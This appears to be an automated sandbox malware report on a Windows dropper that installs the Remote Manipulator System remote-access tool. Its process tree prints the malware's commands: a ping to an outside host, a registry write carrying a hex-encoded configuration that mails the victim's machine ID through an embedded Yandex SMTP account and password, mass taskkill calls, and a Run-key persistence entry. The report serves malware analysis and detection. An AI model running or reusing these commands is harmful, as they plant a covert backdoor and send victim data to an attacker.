Static

static

ee0400adce...fb.exe

windows7_x64

8

ee0400adce...fb.exe

windows10_x64

10

Analysis

  • max time kernel
    146s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01-11-2020 10:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe

  • Size

    4.9MB

  • MD5

    8817ae0956677b821ae053b7fff41968

  • SHA1

    a0e0577c501355b80f7d1240cf9b850598bc0730

  • SHA256

    ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb

  • SHA512

    0d0e7d149d7bf6217b9e169fbcb8a85460f8d20f1868b2ae6f686e2211f6cf6c2fa89831d72d8a34c4135252d5b99d48203cac58490c38411c98e9f0447c9883

Score
8/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 6 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • JavaScript code in executable 3 IoCs
  • Delays execution with timeout.exe 2 IoCs
    evasion
  • Kills process with taskkill 100 IoCs
    evasion
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 104 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 443 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe
    "C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-MPQAC.tmp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.tmp" /SL5="$20158,4482184,721408,C:\Users\Admin\AppData\Local\Temp\ee0400adcec67d05e4b6825df53ff7e5fb5d86680a65264976940239c322d9fb.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:1240
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /c ping -n 2 Ping-ip.hldns.ru|find "TTL="
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:776
        • C:\Windows\SysWOW64\PING.EXE
          ping -n 2 Ping-ip.hldns.ru
          4⤵
          • Runs ping.exe
          PID:1724
        • C:\Windows\SysWOW64\find.exe
          find "TTL="
          4⤵
            PID:980
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C ""C:\ProgramData\Immunity\install.cmd""
          3⤵
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\TektonIT\Remote Manipulator System\Host\Parameters" /f /v "notification" /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313038223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b43434136343745432d313543392d344239392d424538332d4337434346423645353244337d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393130383c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e534d54502e79616e6465782e72753c2f686f73743e3c706f72743e3538373c2f706f72743e3c757365726e616d653e736368616b75726f784079616e6465782e72753c2f757365726e616d653e3c70617373776f72643e6f4e33396a3138786771536a33654b5057444744704b76646a6f38384d66536d3c2f70617373776f72643e3c66726f6d5f656d61696c3e736368616b75726f784079616e6465782e72753c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e706175373838377061754079616e6465782e72753c2f656d61696c3e3c7375626a6563743e496e7465726e65742d494420d181d0b3d0b5d0bdd0b5d180d0b8d180d0bed0b2d0b0d0bd3a20254944253c2f7375626a6563743e3c746578743e2c2c2671756f743b49443a20254944252671756f743b2c2671756f743bd0a1d0b5d180d0b2d0b5d1803a2025534552564552252671756f743b2c2c2671756f743bd098d0bcd18f20d0bfd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18f3a2025555345524e414d45252671756f743b2c2671756f743bd09dd0b0d0b7d0b2d0b0d0bdd0b8d0b520d0bad0bed0bcd0bfd18cd18ed182d0b5d180d0b03a2025434f4d504e414d45252671756f743b2c2671756f743bd09fd0bed0bbd18cd0b7d0bed0b2d0b0d182d0b5d0bbd18c20d0bfd180d0b5d0b4d181d182d0b0d0b2d0b8d0bbd181d18f20d0bad0b0d0ba3a202553454c464944252671756f743b2c3c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a
            4⤵
              PID:1520
            • C:\Windows\SysWOW64\timeout.exe
              TIMEOUT /T 3
              4⤵
              • Delays execution with timeout.exe
              PID:1124
            • C:\ProgramData\Immunity\rutserv.exe
              "C:\ProgramData\Immunity\rutserv.exe"
              4⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:324
              • C:\ProgramData\Immunity\rutserv.exe
                C:\ProgramData\Immunity\rutserv.exe -second
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                PID:328
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1636
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1700
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1740
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1484
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1644
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1776
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:404
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1900
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1156
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:324
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1012
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1880
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:512
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1292
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:920
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1864
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1724
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1492
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1756
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1892
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1752
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1532
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1800
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:928
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1204
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1552
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1760
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1808
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:848
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:980
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1516
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1276
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:924
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:308
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:964
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1696
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1620
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:972
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:432
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1708
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
              • Kills process with taskkill
              PID:1872
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /f /im "rundll32.exe"
              4⤵
                PID:1028
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /f /im "rundll32.exe"
                4⤵
                  PID:1068
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:1320
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                  • Kills process with taskkill
                  PID:1496
                • C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im "rundll32.exe"
                  4⤵
                    PID:1864
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1636
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1960
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:1500
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                    • Kills process with taskkill
                    PID:916
                  • C:\Windows\SysWOW64\taskkill.exe
                    taskkill /f /im "rundll32.exe"
                    4⤵
                      PID:1516
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im "rundll32.exe"
                      4⤵
                      • Kills process with taskkill
                      PID:1740
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im "rundll32.exe"
                      4⤵
                        PID:924
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /f /im "rundll32.exe"
                        4⤵
                          PID:976
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im "rundll32.exe"
                          4⤵
                            PID:1752
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im "rundll32.exe"
                            4⤵
                              PID:1532
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                              • Kills process with taskkill
                              PID:1200
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im "rundll32.exe"
                              4⤵
                                PID:324
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im "rundll32.exe"
                                4⤵
                                • Kills process with taskkill
                                PID:1096
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im "rundll32.exe"
                                4⤵
                                • Kills process with taskkill
                                PID:832
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /f /im "rundll32.exe"
                                4⤵
                                  PID:1880
                                • C:\Windows\SysWOW64\taskkill.exe
                                  taskkill /f /im "rundll32.exe"
                                  4⤵
                                    PID:1136
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1328
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1320
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1772
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1808
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:848
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:980
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1548
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:816
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1492
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1740
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                    • Kills process with taskkill
                                    PID:924
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im "rundll32.exe"
                                    4⤵
                                      PID:976
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im "rundll32.exe"
                                      4⤵
                                      • Kills process with taskkill
                                      PID:948
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im "rundll32.exe"
                                      4⤵
                                      • Kills process with taskkill
                                      PID:1620
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im "rundll32.exe"
                                      4⤵
                                        PID:972
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im "rundll32.exe"
                                        4⤵
                                        • Kills process with taskkill
                                        PID:432
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill /f /im "rundll32.exe"
                                        4⤵
                                        • Kills process with taskkill
                                        PID:340
                                      • C:\Windows\SysWOW64\timeout.exe
                                        TIMEOUT /T 9
                                        4⤵
                                        • Delays execution with timeout.exe
                                        PID:1872
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "nots" /t REG_SZ /d "C:\ProgramData\Immunity\rutserv.exe"
                                        4⤵
                                        • Adds Run key to start application
                                        PID:1516

                                Network

                                MITRE ATT&CK Enterprise v6

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • memory/324-20-0x0000000003F80000-0x0000000003F91000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/324-21-0x0000000004390000-0x00000000043A1000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/324-22-0x0000000003F80000-0x0000000003F91000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/328-512-0x0000000004CF0000-0x0000000004D01000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/328-467-0x0000000003EB0000-0x0000000003EC1000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/328-465-0x00000000042C0000-0x00000000042D1000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/328-464-0x0000000003EB0000-0x0000000003EC1000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/328-510-0x0000000004CF0000-0x0000000004D01000-memory.dmp

                                  Filesize

                                  68KB

                                  Download

                                • memory/328-511-0x0000000005100000-0x0000000005111000-memory.dmp

                                  Filesize

                                  68KB

                                  Download